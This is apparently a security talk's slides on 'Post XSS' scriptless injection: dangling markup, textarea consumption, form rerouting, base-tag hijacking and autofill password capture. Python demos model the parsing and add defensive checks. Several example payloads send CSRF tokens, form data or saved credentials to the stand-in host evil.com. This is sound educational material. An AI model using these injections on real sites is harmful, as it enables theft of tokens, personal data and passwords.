Post XSS

www.Instaqube.com
* Cross-site scripting (XSS) is a type of injection attack in which malicious
  scripts are injected into otherwise benign and trusted web sites.

* It occurs when an attacker uses a web application to send malicious code,
  generally in the form of a client-side script, to a different end user.

* The flaws that allow these attacks to succeed are prevalent in most web
  applications that take user input and generate output from it without
  adequate validation or encoding of that input.

* An attacker can use XSS to send a malicious script to an unsuspecting
  user. The end user's browser has no way of determining that the script
  should not be trusted, and will execute it.

* This gives the malicious script access to cookies and other sensitive
  information retained by the browser for use by the site. Such scripts
  can also rewrite the HTML content of the page.

* XSS should be tested for in anything that accepts user input and displays
  it in the web page after rendering. XSS attacks succeed because most
  programmers do not apply HTML encoding to user input, trusting it as
  received.

* E.g.: if a user enters "<script>alert(document.cookie)</script>" in a
  text field, the input may, upon submission, be rendered as a script tag,
  producing a popup alert that shows the cookies.

* There are plenty of other XSS vectors, and more information about XSS,
  at OWASP.




* What?
    * Very similar to XSS, except that the attacker is limited to injecting
      HTML markup: the browser-side defenses listed below contain any
      injected script, so the page is a script-less environment.

* Why Post XSS?
    * Browser-level efforts to improve the security of web applications
      focus on the containment of attacker-originating scripts.
    * Content Security Policy (CSP) removes the ability to inline JavaScript
      code in a protected HTML document.
    * CSP also whitelists the permissible sources for any externally-loaded
      scripts.
    * Related approaches, such as the NoScript add-on, the built-in XSS
      filters in Internet Explorer and Chrome, client-side APIs such as
      toStaticHTML(...), and the HTML sanitizers built into server-side
      frameworks, also deserve a note.


* The goal of a successful XSS attack is the extraction of user-specific
  secrets from the vulnerable application.

* Historically, XSS exploits sought to obtain HTTP (session) cookies.

* The introduction of httponly cookies greatly limited this possibility.

* In an application where theft of HTTP cookies is not practical,
  exfiltration attempts are usually geared towards the extraction of any
  of the following:
   * Personal data
   * Tokens used to defend against cross-site request forgery (CSRF)
     attacks
   * Capability-bearing URLs



* Dangling markup injection
* <textarea>-based consumption
* Rerouting of existing forms
* Use of <base> to hijack relative URLs
* Form injection to intercept browser-managed passwords
* The limits of exfiltration defenses


Dangling markup injection

* Injection of non-terminated markup, which consumes a significant portion
  of the subsequent HTML syntax until the expected terminating sequence is
  encountered.

* Opposite quote: the injected attribute is opened with the quote character
  that is not used by the markup to be consumed (a single quote below,
  since the token's value is double-quoted), so the attribute value only
  ends at the next single quote that happens to occur in the page text.

* Scenario: we are allowed to inject anything into the HTML content above
  the sensitive data that we want to steal.

* Example:
      <img src='http://evil.com/log.cgi?      ← injected line with a non-terminated parameter
      ...
      <input type="hidden" name="xsrf_token" value="12345">
      ...
      '                                        ← normally-occurring apostrophe in page text
      ...
      </div>

  Everything between the two single quotes, the hidden token included,
  becomes part of the image URL that the browser requests from evil.com.



* Limitation: the injection point has to appear before the sensitive data
  to be extracted.

* If governed by pure chance, this condition will be met in 50% of all
  cases.

* Demo: Dangling markup injection
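
The consumption described above, as an added example that is not part of the slides: Python's html.parser stands in for the browser's tokenizer, which treats a quoted attribute value the same way (everything up to the matching quote, newlines and tags included). The page fragment and the evil.com injection are constructed to mirror the slide's example, and the last function is a check a defender can run over rendered output.

```python
from html import escape
from html.parser import HTMLParser

# Constructed page fragment modelled on the slide: the injection point (an
# <img> whose src value is never closed) sits above a hidden CSRF token, and the
# next apostrophe in normal page text is what finally closes the attribute.
INJECTED = "<img src='http://evil.com/log.cgi?"
PAGE_TEMPLATE = (
    "<div>{user_content}\n"
    '<input type="hidden" name="xsrf_token" value="12345">\n'
    "Don't forget to save your profile.\n"   # normally-occurring apostrophe
    "</div>"
)


class TagCollector(HTMLParser):
    """Records every start tag with its attributes, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(html):
    parser = TagCollector()
    parser.feed(html)
    parser.close()
    return parser.tags


def img_src(html):
    """The src value the tokenizer hands to the <img> request, or None if no <img> survives."""
    for tag, attrs in parse_tags(html):
        if tag == "img":
            return attrs.get("src")
    return None


def render(user_content, encode):
    # The only difference between the vulnerable and the fixed page is whether
    # user input is HTML-encoded before it is written into the template
    # (quote=True also encodes ' and ", which is what defeats the dangling quote).
    if encode:
        user_content = escape(user_content, quote=True)
    return PAGE_TEMPLATE.replace("{user_content}", user_content)


def leaked_token(html):
    """True if the hidden token was swallowed into the img src, i.e. would be sent to evil.com."""
    src = img_src(html)
    return src is not None and "xsrf_token" in src and "12345" in src


def attr_values_containing_markup(html):
    """Defensive check over rendered output: an attribute value that contains '<'
    is the signature of a dangling quote having consumed later markup."""
    return [(tag, name) for tag, attrs in parse_tags(html)
            for name, value in attrs.items() if value and "<" in value]


if __name__ == "__main__":
    vuln = render(INJECTED, encode=False)
    safe = render(INJECTED, encode=True)
    print("unencoded: token leaks via img src ->", leaked_token(vuln))   # True
    print("encoded:   token leaks via img src ->", leaked_token(safe))   # False
    print("suspicious attribute values ->", attr_values_containing_markup(vuln))
```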



<textarea>-based consumption

* The previous method has a limitation: it depends on a matching quote
  character occurring after the sensitive data.

* Injection of a <textarea> instead: the browser treats everything that
  follows as plain text until a closing </textarea> tag is found.

* Scenario: both single and double quotes occur before the sensitive data
  we want to steal, so a dangling attribute would be terminated too early.

* The injection can be placed before or after the legitimate form tag.

* Example:
      <form action='http://evil.com/log.cgi'><textarea>   ← injected line
      ...
      <input type="hidden" name="xsrf_token" value="12345">
      ...
      (EOF)

  With no closing </textarea> before the end of the file, the rest of the
  page becomes the content of the injected form's text area.




* Limitation: in contrast to the previous method, a degree of user
  interaction is needed to exfiltrate the data.

* The victim has to submit the form by some means.

* Forms with auto-submit capabilities are being considered for HTML5. Such
  a feature may unintentionally assist with the automation of this attack
  in future browsers.

* Demo: <textarea>-based consumption


Rerouting of existing forms

* This works because <form> tags cannot be nested: while one form is
  still open, the parser ignores a second <form> start tag.

* Scenario: we can inject anything above an existing form tag.

* This allows the attacker to change the action URL to which the existing
  form will be submitted.

* Example:
      <form action='http://evil.com/log.cgi'>   ← injected line
      ...
      <form action='update_profile.php'>        ← legitimate, pre-existing form (ignored by the parser)
      ...
      <input type="text" name="real_name" value="John Q. Public">
      ...
      </form>

* Interesting when used to target forms automatically populated with
  user-specific secrets.

* Demo: Rerouting of existing forms




Use of <base> to hijack relative URLs

* Injection of <base> tags.

* A <base> tag changes the semantics of all subsequently appearing
  relative URLs, which are then resolved against its href instead of the
  page's own URL.

* Scenario: we are allowed to insert content above the form element.

* Example:
      <base href='http://evil.com/'>            ← injected line
      ...
      <form action='update_profile.php'>        ← legitimate, pre-existing form, now
                                                   submitting to http://evil.com/update_profile.php
      ...
      <input type="text" name="real_name" value="John Q. Public">
      ...
      </form>
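
The two form-targeting techniques above, as an added example that is not from the slides: a small model of the two parsing rules they rely on (a <form> start tag is ignored while another form is still open, and only the first <base href> sets the document base URL), used to compute where each field of the legitimate form would actually be submitted. Python's html.parser stands in for the browser, and the page at the assumed URL https://shop.example/profile is constructed.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed page: the injection point sits directly above the legitimate form.
# The page URL is assumed; the form and field names mirror the slides.
PAGE_URL = "https://shop.example/profile"
LEGIT_FORM = (
    "<form action='update_profile.php'>\n"
    '<input type="text" name="real_name" value="John Q. Public">\n'
    '<input type="hidden" name="xsrf_token" value="12345">\n'
    "</form>"
)


def page(injected):
    return f"<html><body>\n{injected}\n{LEGIT_FORM}\n</body></html>"


class FormOwnerModel(HTMLParser):
    """Models the parts of HTML tree construction that decide where a field goes:
    - the document base URL comes from the FIRST <base href> only;
    - while a form is open (the parser's 'form element pointer' is set), a
      second <form> start tag is ignored, so its fields belong to the earlier form;
    - a field is associated with whichever form is open when it is parsed."""

    def __init__(self):
        super().__init__()
        self.base_href = None      # raw href of the first <base>, if any
        self.open_action = None    # raw action of the currently open form
        self.in_form = False
        self.fields = []           # (field name, raw action of its form owner)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and self.base_href is None and a.get("href") is not None:
            self.base_href = a["href"]
        elif tag == "form":
            if not self.in_form:              # a nested <form> start tag is ignored
                self.in_form = True
                self.open_action = a.get("action")
        elif tag == "input" and self.in_form:
            self.fields.append((a.get("name"), self.open_action))

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False
            self.open_action = None


def submit_targets(html, page_url):
    """Map each form field to the absolute URL its owning form would submit to."""
    model = FormOwnerModel()
    model.feed(html)
    model.close()
    # The base href is itself resolved against the document URL; actions are
    # then resolved against that base. An empty or missing action means the
    # document URL itself.
    base = urljoin(page_url, model.base_href) if model.base_href is not None else page_url
    return {name: (urljoin(base, action) if action else page_url)
            for name, action in model.fields}


def foreign_targets(html, page_url):
    """Defensive check: submission URLs whose host differs from the page's own host."""
    host = urlsplit(page_url).hostname
    return sorted({u for u in submit_targets(html, page_url).values()
                   if urlsplit(u).hostname != host})


if __name__ == "__main__":
    cases = [
        ("clean page", ""),
        ("rerouted form", "<form action='http://evil.com/log.cgi'>"),
        ("hijacked base", "<base href='http://evil.com/'>"),
        ("encoded input", escape("<base href='http://evil.com/'>", quote=True)),
    ]
    for label, injected in cases:
        html = page(injected)
        print(f"{label:14s} -> {submit_targets(html, PAGE_URL)}")
        print(f"{'':14s}    off-site: {foreign_targets(html, PAGE_URL)}")
```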

Form injection to intercept browser-managed passwords

* Browsers have features to remember usernames and passwords for websites.

* Browsers auto-fill the fields after matching the domain and the id and
  name attributes of the fields.

* A form can be injected into the domain, using the previous exfiltration
  techniques, to steal the user's credentials.

* Example:
      <form action="http://www.evil.com" method="POST">
        <input type="text" id="username" name="username">
        <input type="password" id="password" name="password">
      </form>


* GET can be specified instead of POST, submitting the credentials to a
  selected same-site destination.

* That destination may link to third-party sites (thus leaking the
  credentials in the Referer header),

* or may echo the parameters back in the page.




The limits of exfiltration defenses

* All the previous vectors redirect the data to the attacker's domain.

* A developer may therefore wish to restrict the set of permissible
  destinations for markup such as <form>, <a href=...>, or <img> to his
  own domain.

* However, any attempt to prevent exfiltration this way, even in
  script-less environments, is unlikely to be successful.

* Exfiltration attempts do not have to be geared toward relaying the data
  to a third-party website.

* Moving data from a private place to a public place, all within the scope
  of a single website, is also sufficient.





* Example:
      <form action='/post_review.php'>                      ← injected lines
      <input type='hidden' name='review_body' value="
      ...
      Your current shipping address:                        ← existing page text to be exfiltrated
      123 Evergreen Terrace, Springfield, USA
      ...
      <form action="/update_address.php">                   ← existing form (ignored by the parser)
      ...
      <input type="hidden" name="xsrf_token" value="12345"> ← token valid for /update_address.php
                                                               and /post_review.php
      ...
      </form>

* Demo: Addendum: The limits of exfiltration defenses

* Reference: http://lcamtuf.coredump.cx/postxss/




Thank You
Q&A